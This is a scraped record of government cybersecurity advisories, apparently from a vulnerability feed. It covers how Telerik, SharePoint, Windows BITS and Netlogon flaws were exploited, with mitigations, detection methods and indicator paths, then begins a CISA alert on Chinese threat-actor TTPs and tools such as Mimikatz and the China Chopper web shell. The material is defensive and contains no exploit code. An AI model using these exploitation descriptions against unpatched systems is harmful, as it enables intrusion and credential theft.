[Patch Available](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>)

_**Recommended Mitigations**_

 * Update to the most recent version of Telerik UI for ASP.NET AJAX (at least 2020.1.114 or later).

_**Detection Methods**_

 * ACSC has an example PowerShell script that can be used to identify vulnerable Telerik UI DLLs on Windows web server hosts.
 * Vulnerable hosts should be reviewed for evidence of exploitation. Indicators of exploitation can be found in IIS HTTP request logs and within the Application Windows event log.
Details of the above PowerShell script and exploitation detection recommendations are available in [ACSC Advisory 2020-004](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-004-remote-code-execution-vulnerability-being-actively-exploited-vulnerable-versions-telerik-ui-sophisticated-actors>).\n * Exploitation of this and previous Telerik UI vulnerabilities commonly resulted in the installation of web shell malware. NSA provides guidance on [detecting and preventing web shell malware](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>). \n \n**_Vulnerable Technologies and Versions_**\n\nTelerik UI for ASP.NET AJAX versions prior to R1 2020 (2020.1.114) are affected. \n \n**_References_**\n\n * [Telerik UI for ASP.NET AJAX security advisory \u2013 Allows JavaScriptSerializer Deserialization](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>)\n * [NIST NVD Vulnerability Detail: CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>)\n * [ACSC Advisory 2020-004: Remote Code Execution Vulnerability Being Actively Exploited in Vulnerable Versions of Telerik UI by Sophisticated Actors](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-004-remote-code-execution-vulnerability-being-actively-exploited-vulnerable-versions-telerik-ui-sophisticated-actors>)\n * [Bishop Fox \u2013 CVE-2019-18935: Remote Code Execution via Insecure Deserialization in Telerik UI](<https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui>)\n * [FBI FLASH: Indicators Associated with Netwalker Ransomware](<https://www.ic3.gov/Media/News/2020/200929-2.pdf>) \n \n_Table 13: CVE-2019-0604 Vulnerability Details_\n\nMicrosoft SharePoint Remote Code Execution (CVE-2019-0604) \n--- \n \n_**Vulnerability Description**_\n\nA vulnerability in an XML deserialization component within Microsoft SharePoint allowed 
remote attackers to execute arbitrary code on vulnerable Microsoft SharePoint servers.\n\n| \n\n**_CVSS 3.0_**\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nThis vulnerability was typically exploited to install web shell malware on vulnerable hosts. A web shell could be placed in any location served by the associated Internet Information Services (IIS) web server and did not require authentication. These web shells would commonly be installed in the Layouts folder within the Microsoft SharePoint installation directory, for example:\n\n`C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\<version_number>\\Template\\Layouts`\n\nThe `xmlSerializer.Deserialize()` method does not adequately sanitize user input that is received from the PickerEntity/ValidateEntity (`picker.aspx`) functions in the serialized XML payloads. Once the serialized XML payload is deserialized, the XML code is evaluated for relevant XML commands and strings. A user can attack .NET-based XML parsers with XMLNS payloads using the `<system:string>` tag and embedding malicious operating system commands. \n\n_The exploit was used in malware phishing and the WickrMe/Hello Ransomware campaigns._\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0604>) \n \n_**Recommended Mitigations**_\n\n * Upgrade on-premise installations of Microsoft SharePoint to the latest available version (Microsoft SharePoint 2019) and patch level.\n * On-premise Microsoft SharePoint installations with a requirement to be accessed by internet-based remote staff should be moved behind an appropriate authentication mechanism such as a VPN, if possible. 
\n \n_**Detection Methods**_\n\n * The patch level of on-premise Microsoft SharePoint installations should be reviewed for the presence of relevant security updates as outlined in the Microsoft SharePoint security advisory.\n * Vulnerable SharePoint servers should be reviewed for evidence of attempted exploitation. [ACSC Advisory 2019-125](<https://www.cyber.gov.au/acsc/view-all-content/advisories/acsc-advisory-2019-125-targeting-microsoft-sharepoint-cve-2019-0604>) contains advice on reviewing IIS HTTP request logs for evidence of potential exploitation.\n * NSA provides guidance on [detecting and preventing web shell malware](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>). \n \n_**Vulnerable Technologies and Versions**_\n\nAt the time of the vulnerability release, the following Microsoft SharePoint versions were affected: Microsoft Sharepoint 2019, Microsoft SharePoint 2016, Microsoft SharePoint 2013 SP1, and Microsoft SharePoint 2010 SP2. 
\n \n_**References**_\n\n * [Microsoft \u2013 SharePoint Remote Code Execution Vulnerability Security Advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0604>)\n * [NIST NVD Vulnerability Detail: CVE-2019-0604](<https://nvd.nist.gov/vuln/detail/cve-2019-0604>)\n * [ACSC Advisory 2019-125: Targeting of Microsoft SharePoint CVE-2019-0604](<https://www.cyber.gov.au/acsc/view-all-content/advisories/acsc-advisory-2019-125-targeting-microsoft-sharepoint-cve-2019-0604>)\n * [NCSC Alert: Microsoft SharePoint Remote Code Vulnerability](<https://www.ncsc.gov.uk/news/alert-microsoft-sharepoint-remote-code-vulnerability>) \n \n_Table 14: CVE-2020-0787 Vulnerability Details_\n\nWindows Background Intelligent Transfer Service Elevation of Privilege (CVE-2020-0787) \n--- \n \n_**Vulnerability Description**_\n\nAn elevation-of-privilege vulnerability exists in the Windows Background Intelligent Transfer Service (BITS) when it improperly handles symbolic links. An actor can exploit this vulnerability to execute arbitrary code with system-level privileges.\n\n| \n\n_**CVSS 3.0**_\n\nHigh \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nTo exploit this vulnerability, an actor would first need to have the ability to execute arbitrary code on a vulnerable Windows host.\n\nActors exploiting this vulnerability commonly used the proof of concept code released by the security researcher who discovered the vulnerability. 
If an actor left the proof of concept exploit\u2019s working directories unchanged, then the presence of the following folders could be used as an indicator of exploitation:\n\n`C:\\Users\\<username>\\AppData\\Local\\Temp\\workspace \nC:\\Users\\<username>\\AppData\\Local\\Temp\\workspace\\mountpoint \nC:\\Users\\<username>\\AppData\\Local\\Temp\\workspace\\bait`\n\n_The exploit was used in Maze and Egregor ransomware campaigns._\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0787>) \n \n_**Recommended Mitigations**_\n\n * Apply the security updates as recommended in the Microsoft Netlogon security advisory. \n \n_**Detection Methods**_\n\n * The patch level of all Microsoft Windows installations should be reviewed for the presence of relevant security updates as outlined in the Microsoft BITS security advisory. \n \n_**Vulnerable Technologies and Versions**_\n\nWindows 7 for 32-bit and x64-based Systems Service Pack 1, 8.1 for 32-bit and x64-based systems, RT 8.1, 10 for 32-bit and x64-based Systems, 10 1607 for 32-bit and x64-based Systems, 10 1709 for 32-bit and x64-based and ARM64-based Systems, 10 1803 for 32-bit and ARM64-based and x64-based Systems, 10 1809 for 32-bit and ARM64-based and x64-based Systems, 10 1903 for 32-bit and ARM64-based and x64-based Systems, 10 1909 for 32-bit, and ARM64-based and x64-based Systems are vulnerable.\n\nWindows Server 2008 R2 for x64-based Systems Service Pack 1, 2008 R2 for x64-based Systems Service Pack 1 (Server Core Installation), 2008 for 32-bit Systems Service Pack 2, 2008 for 32-bit Systems Service Pack 2 (Server Core Installation), 2012, 2012 (Server Core Installation), 2012 R2, 2012 R2 (Server Core Installation), 2016, 2016 (Server Core Installation), 2019, 2019 (Server Core Installation), 1803 (Server Core Installation), 1903 (Server Core Installation), and 1909 (Server Core Installation) are also vulnerable. 
\n \n_**References**_\n\n * [Microsoft \u2013 Windows Background Intelligent Transfer Service Elevation of Privilege Security Advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0787>)\n * [NIST NVD Vulnerability Detail: CVE-2020-0787](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>)\n * [Security Researcher \u2013 Proof of Concept Exploit Code](<https://itm4n.github.io/cve-2020-0787-windows-bits-eop/>) \n \n_Table 15: CVE-2020-1472 Vulnerability Details_\n\nMicrosoft Netlogon Elevation of Privilege (CVE-2020-1472) \n--- \n \n_**Vulnerability Description**_\n\nThe Microsoft Windows Netlogon Remote Protocol (MS-NRPC) reuses a known, static, zero-value initialization vector (IV) in AES-CFB8 mode, which could allow an unauthenticated attacker to impersonate a domain-joined computer, including a domain controller, and potentially obtain domain administrator privileges.\n\n| \n\n_**CVSS 3.0**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nTo exploit this vulnerability, an actor would first need to have an existing presence on an internal network with network connectivity to a vulnerable Domain Controller, assuming that Domain Controllers are not exposed to the internet.\n\nThe immediate effect of successful exploitation is the ability to authenticate to the vulnerable Domain Controller with Domain Administrator level credentials. 
In compromises involving this vulnerability, exploitation was typically followed immediately by dumping the password hashes of all domain accounts.\n\nThreat actors were observed chaining the MobileIron CVE-2020-15505 vulnerability, used for initial access, with the Netlogon vulnerability to facilitate lateral movement and further compromise of target networks.\n\n_A nation-state APT group has been observed exploiting this vulnerability_.[[18](<https://www.cyber.nj.gov/alerts-advisories/apt10-adds-zerologon-exploitation-to-ttps>)]\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>) \n \n_**Recommended Mitigations**_\n\n * Apply the security updates as recommended in the Microsoft Netlogon security advisory. \n \n_**Detection Methods**_\n\n * The patch level of Domain Controllers should be reviewed for the presence of relevant security updates as outlined in the Microsoft Netlogon security advisory.\n * Reviewing and monitoring Windows Event Logs can identify potential exploitation attempts. However, further investigation would still be required to eliminate legitimate activity. Further information on these event logs is available in the [ACSC 2020-016 Advisory](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472>). \n \n_**Vulnerable Technologies and Versions**_\n\nAt the time of the vulnerability release, the following Microsoft Windows Server versions were vulnerable: all versions of Windows Server 2019; all versions of Windows Server 2016; Windows Server 2012 R2; Windows Server 2012; Windows Server 2008 R2 SP1; and Windows Server versions 1909/1903/1809. 
\n \n_**References**_\n\n * [Microsoft \u2013 Netlogon Elevation of Privilege Vulnerability](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>)\n * [NIST NVD Vulnerability Detail: CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/cve-2020-1472>)\n * [ACSC 2020-016 Netlogon Advisory](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472>)\n * [CISA-FBI Joint Cybersecurity Advisory: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>)\n * [CISA-FBI Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n * [ACSC Advisory 2020-016: \"Zerologon\" \u2013 Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472>)\n * [NCSC Alert: UK Organisations Should Patch Netlogon Vulnerability (Zerologon)](<https://www.ncsc.gov.uk/news/alert-organisations-should-patch-netlogon-vulnerability>) \n \nFor additional general best practices for mitigating cyber threats, see the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) and ACSC\u2019s [Essential Eight](<https://www.cyber.gov.au/acsc/view-all-content/essential-eight>) mitigation strategies.\n\n### Additional Resources\n\n#### Free Cybersecurity Services\n\nCISA offers several free cyber hygiene vulnerability scanning and web application services to help U.S. 
federal agencies, state and local governments, critical infrastructure, and private organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. For more information about [CISA\u2019s free services](<https://www.cisa.gov/cyber-hygiene-services>), or to sign up, email [vulnerability_info@cisa.dhs.gov](<mailto:vulnerability_info@cisa.dhs.gov>).\n\n#### Cyber Essentials\n\n[CISA\u2019s Cyber Essentials](<https://www.cisa.gov/cyber-essentials>) is a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices.\n\n#### Cyber.gov.au \n\n[ACSC\u2019s website](<https://www.cyber.gov.au/>) provides advice and information about how to protect individuals and families, small- and medium-sized businesses, large organizations and infrastructure, and government organizations from cyber threats.\n\n#### ACSC Partnership Program\n\nThe ACSC Partnership Program enables Australian organizations and individuals to engage with ACSC and fellow partners, drawing on collective understanding, experience, skills, and capability to lift cyber resilience across the Australian economy.\n\nAustralian organizations, including government and private-sector entities, as well as individuals, are welcome to sign up at [Become an ACSC partner](<https://www.cyber.gov.au/partner-hub/become-a-partner>) to join.\n\n#### NCSC 10 Steps\n\nThe NCSC offers [10 Steps to Cyber Security](<https://urldefense.us/v3/__https:/www.ncsc.gov.uk/collection/10-steps__;!!BClRuOV5cvtbuNI!T8Z-cMwGes9PcbBL1utGkQdFFUBjxNk7elZg1ioCK-eU1tUQokVWKONDFlwSGb1kHLNs74-CWWI8Rbcz$>), providing detailed guidance on how medium and large organizations can manage their security.\n\nOn vulnerabilities specifically, the NCSC has [guidance to organizations on establishing an effective vulnerability management 
process](<https://urldefense.us/v3/__https:/www.ncsc.gov.uk/guidance/vulnerability-management__;!!BClRuOV5cvtbuNI!T8Z-cMwGes9PcbBL1utGkQdFFUBjxNk7elZg1ioCK-eU1tUQokVWKONDFlwSGb1kHLNs74-CWfrZnnW4$>), focusing on the management of widely available software and hardware.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. If you have any further questions related to this Joint Cybersecurity Advisory, or to request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<mailto:Central@cisa.gov>).\n\n### References\n\n[[1] NSA-CISA-FBI Cybersecurity Advisory: Russian SVR Targets U.S. 
and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)\n\n[[2] CISA-FBI-NSA-NCSC Advisory: Further TTPs Associated with SVR Cyber Actors](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/joint-ncsc-cisa-fbi-nsa-cybersecurity-advisory-russian-svr>)\n\n[[3] NSA Cybersecurity Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)\n\n[[4] ACSC Advisory 2020-001-4: Remediation for Critical Vulnerability in Citrix Application Delivery Controller and Citrix Gateway](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2020-001-4-remediation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway>)\n\n[[5] NCSC Alert: Actors Exploiting Citrix Products Vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[6] Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. 
Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n\n[[7] CISA-FBI Joint Cybersecurity Advisory: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[8] ACSC Alert: APT Exploitation of Fortinet Vulnerabilities](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>)\n\n[[9] NCSC Alert: Alert: Critical Risk to Unpatched Fortinet VPN Devices](<https://www.ncsc.gov.uk/news/critical-risk-unpatched-fortinet-vpn-devices>)\n\n[[10] NSA Cybersecurity Advisory: Mitigating Recent VPN Vulnerabilities](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating Recent VPN Vulnerabilities - Copy.pdf>)\n\n[[11] NCSC Alert: Vulnerabilities Exploited in VPN Products Used Worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n[[12] NCSC-Canada\u2019s Communications Security Establishment-NSA-CISA Advisory: APT29 Targets COVID-19 Vaccine Development (CSE)](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)\n\n[[13] ACSC Advisory: Summary of Tactics, Techniques and Procedures Used to Target Australian Networks](<https://www.cyber.gov.au/acsc/view-all-content/advisories/summary-tactics-techniques-and-procedures-used-target-australian-networks>)\n\n[[14] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)\n\n[[15] CISA Alert: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n\n[[16] CISA Emergency Directive (ED 20-03): Windows DNS Server Vulnerability](<https://www.cisa.gov/blog/2020/07/16/emergency-directive-ed-20-03-windows-dns-server-vulnerability>)\n\n[[17] NCSC Alert: Alert: Multiple Actors are Attempting to Exploit MobileIron Vulnerability CVE 
2020-15505](<https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability>)\n\n[[18] NJCCIC Alert: APT10 Adds ZeroLogon Exploitation to TTPs](<https://www.cyber.nj.gov/alerts-advisories/apt10-adds-zerologon-exploitation-to-ttps>)\n\n### Revisions\n\nInitial Version: July 28, 2021|August 4, 2021: Fixed typo|August 20, 2021: Adjusted vendor name for CVE-2020-1472\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-20T12:00:00", "type": "ics", "title": "Top Routinely Exploited Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": 
"2021-08-20T12:00:00", "id": "AA21-209A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-209a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:34:12", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\n_**Note**: on October 20, 2020, the National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) providing information on publicly known vulnerabilities exploited by Chinese state-sponsored cyber actors to target computer networks holding sensitive intellectual property, economic, political, and military information. This Alert has been updated to include information on vulnerabilities exploited by Chinese state-sponsored actors (see Table 4)._\n\nIn light of heightened tensions between the United States and China, the Cybersecurity and Infrastructure Security Agency (CISA) is providing specific Chinese government and affiliated cyber threat actor tactics, techniques, and procedures (TTPs) and recommended mitigations to the cybersecurity community to assist in the protection of our Nation\u2019s critical infrastructure. In addition to the recommendations listed in the Mitigations section of this Alert, CISA recommends organizations take the following actions.\n\n 1. **Adopt a state of heightened awareness. **Minimize gaps in personnel availability, consistently consume relevant threat intelligence, and update emergency call trees.\n 2. **Increase organizational vigilance.** Ensure security personnel monitor key internal security capabilities and can identify anomalous behavior. 
Flag any known Chinese indicators of compromise (IOCs) and TTPs for immediate response.\n 3. **Confirm reporting processes.** Ensure personnel know how and when to report an incident. The well-being of an organization\u2019s workforce and cyber infrastructure depends on awareness of threat activity. Consider [reporting incidents](<https://us-cert.cisa.gov/report>) to CISA to help serve as part of CISA\u2019s early warning system (see the Contact Information section below).\n 4. **Exercise organizational incident response plans.** Ensure personnel are familiar with the key steps they need to take during an incident. Do they have the accesses they need? Do they know the processes? Are various data sources logging as expected? Ensure personnel are positioned to act in a calm and unified manner.\n\n### Technical Details\n\n#### China Cyber Threat Profile\n\nChina has a history of using national military and economic resources to leverage offensive cyber tactics in pursuing its national interests. The \u201cMade in China 2025\u201d 10-year plan outlines China\u2019s top-level policy priorities.[[1](<https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf>)],[[2](<https://fas.org/sgp/crs/row/IF10964.pdf>)] China may seek to target the following industries deemed critical to U.S. national and economic interests: new energy vehicles, next generation information technology (IT), biotechnology, new materials, aerospace, maritime engineering and high-tech ships, railway, robotics, power equipment, and agricultural machinery.[[3](<https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade>)] China has exercised its increasingly sophisticated capabilities to illegitimately obtain U.S. intellectual property (IP), suppress both social and political perspectives deemed dangerous to China, and harm regional and international opponents.\n\nThe U.S. 
Intelligence Community and various private sector threat intelligence organizations have identified the Chinese People\u2019s Liberation Army (PLA) and Ministry of State Security (MSS) as driving forces behind Chinese state-sponsored cyberattacks, either through contractors in the Chinese private sector or by the PLA and MSS entities themselves. China continues to engage in espionage-related activities that include theft of sensitive information such as innovation capital, IP, and personally identifiable information (PII). China has demonstrated a willingness to push the boundaries of its activities to secure information critical to advancing its economic prowess and competitive advantage.\n\n#### Chinese Cyber Activity\n\nAccording to open-source reporting, offensive cyber operations attributed to the Chinese government targeted, and continue to target, a variety of industries and organizations in the United States, including healthcare, financial services, defense industrial base, energy, government facilities, chemical, critical manufacturing (including automotive and aerospace), communications, IT, international trade, education, videogaming, faith-based organizations, and law firms.\n\nAdditionally, numerous Department of Justice (DOJ) indictments over several years provide evidence to suggest Chinese threat actors continuously seek to illegally obtain and exfiltrate U.S. IP. 
Their targets also include western companies with operations inside China.\n\nPublic reporting that associates Chinese actors with a range of high-profile attacks and offensive cyber activity includes:\n\n * **February 2013 \u2013 Cyber Threat Intelligence Researchers Link Advanced Persistent Threat (APT) 1 to China:** a comprehensive report publicly exposed APT1 as part of China\u2019s military cyber operations and a multi-year effort that exfiltrated IP from roughly 141 companies spanning 20 major industries.[[4](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>)] APT1 established access to the victims\u2019 networks and methodically exfiltrated IP across a large range of industries identified in China\u2019s 12th 5-Year Plan. A year later, the DOJ indicted Chinese cyber threat actors assigned to PLA Unit 61398 for the first time (also highlighted in the report).[[5](<https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor>)]\n * **April 2017 \u2013 Chinese APTs Targeting IP in 12 Countries:** CISA announced Chinese state-backed APTs carried out a multi-year campaign of cyber-enabled IP theft that targeted global technology service providers and their customers. 
The threat actors leveraged stolen administrative credentials (local and domain) and placed sophisticated malware on critical systems in an effort to steal the IP and sensitive data of companies located in at least 12 countries.[[6](<https://us-cert.cisa.gov/ncas/alerts/TA17-117A>)]\n * **December 2018 \u2013 Chinese Cyber Threat Actors Indicted for Compromising Managed Service Providers (MSPs):** DOJ indicted two Chinese cyber threat actors believed to be associated with APT10, who targeted MSPs and their large customer base through phishing and spearphishing campaigns aimed at exfiltrating sensitive business data and, possibly, PII.[[7](<https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers>)] CISA also briefed stakeholders on Chinese APT groups who targeted MSPs and their customers to steal data and further operationalize commercial and economic espionage.[[8](<https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf>)]\n * **February 2020 \u2013 China\u2019s Military Indicted for 2017 Equifax Hack:** DOJ indicted members of China\u2019s PLA for stealing large amounts of PII and IP. The Chinese cyber threat actors exploited a vulnerability in the company\u2019s dispute resolution website to enter the network, conduct reconnaissance, upload malware, and steal credentials to extract the targeted data. The breach impacted roughly half of all American citizens and stole Equifax\u2019s trade secrets.[[9](<https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military>)]\n * **May 2020 \u2013 China Targets COVID-19 Research Organizations:** the Federal Bureau of Investigation (FBI) and CISA reported the targeting and compromise of U.S. 
organizations conducting COVID-19-related research by cyber actors affiliated with China.[[10](<https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations>)] Large-scale password spraying campaigns were a commonly observed tactic in illicitly obtaining IP related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research.[[11](<https://us-cert.cisa.gov/ncas/alerts/AA20126A>)],[[12](<https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity >)]\n\n#### Common TTPs of Publicly Known Chinese Threat Actors\n\nThe section below provides common, publicly known TTPs employed by Chinese threat actors, mapped to the MITRE ATT&CK framework. Where possible, the tables include actions for detection and mitigation. This section is not exhaustive and does not detail all TTPs or detection and mitigation actions. \n\n#### PRE-ATT&CK TTPs\n\nChinese threat actors commonly use the techniques listed in Table 1 to achieve reconnaissance (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/tactics/TA0015/>)]), staging (_Stage Capabilities_ [[TA0026](<https://attack.mitre.org/tactics/TA0026/>)]), and testing (_Test Capabilities_ [[TA0025](<https://attack.mitre.org/tactics/TA0025/>)]) before executing an attack. 
PRE-ATT&CK techniques can be difficult to detect and mitigate; however, defenders should be aware of the use of these techniques.\n\n_Table 1: Chinese threat actor PRE-ATT&CK techniques_\n\n**Technique** | **Description** \n---|--- \n_Acquire and/or Use 3rd Party Software Services_ [[T1330](<https://attack.mitre.org/techniques/T1330/>)] | Staging and launching attacks from software-as-a-service solutions that cannot be easily tied back to the APT \n_Compromise 3rd Party Infrastructure to Support Delivery_ [[T1334](<https://attack.mitre.org/techniques/T1334/>)] | Compromising infrastructure owned by other parties to facilitate attacks (instead of directly purchasing infrastructure) \n_Domain Registration Hijacking_ [[T1326](<https://attack.mitre.org/techniques/T1326/>)] | Changing the registration of a domain name without the permission of its original registrant and then using the legitimate domain as a launch point for malicious purposes \n_Acquire Open-Source Intelligence (OSINT) Data Sets and Information_ [[T1247](<https://attack.mitre.org/techniques/T1247/>)] | Gathering data and information from publicly available sources, including public-facing websites of the target organization \n_Conduct Active Scanning_ [[T1254](<https://attack.mitre.org/techniques/T1254/>)] | Gathering information on target systems by scanning the systems for vulnerabilities. 
Adversaries are likely using tools such as Shodan to identify vulnerable devices connected to the internet \n_Analyze Architecture and Configuration Posture _[[T1288](<https://attack.mitre.org/techniques/T1288/>)] | Analyzing technical scan results to identify architectural flaws, misconfigurations, or improper security controls in victim networks \n_Upload, Install, and Configure Software/Tools_ [[T1362](<https://attack.mitre.org/techniques/T1362>)] | Placing malware on systems illegitimately for use during later stages of an attack to facilitate exploitability and gain remote access \n \n#### Enterprise ATT&CK TTPs\n\nChinese threat actors often employ publicly known TTPs against enterprise networks. To orchestrate attacks, they use commonly implemented security testing tools and frameworks, such as:\n\n * Cobalt Strike and Beacon\n * Mimikatz\n * PoisonIvy\n * PowerShell Empire\n * China Chopper Web Shell\n\nTable 2 lists common, publicly known, TTPs used by Chinese threat actors against enterprise networks and provides options for detection and mitigation based on the MITRE ATT&CK framework.\n\n_Table 2: Common Chinese threat actor techniques, detection, and mitigation_\n\n**Technique / Sub-Technique** | **Detection** | **Mitigation** \n---|---|--- \n_Obfuscated Files or Information _[[T1027](<https://attack.mitre.org/techniques/T1027/>)] | \n\n * Detect obfuscation by analyzing signatures of modified files.\n * Flag common syntax used in obfuscation.\n| \n\n * Use antivirus/antimalware software to analyze commands after processing. 
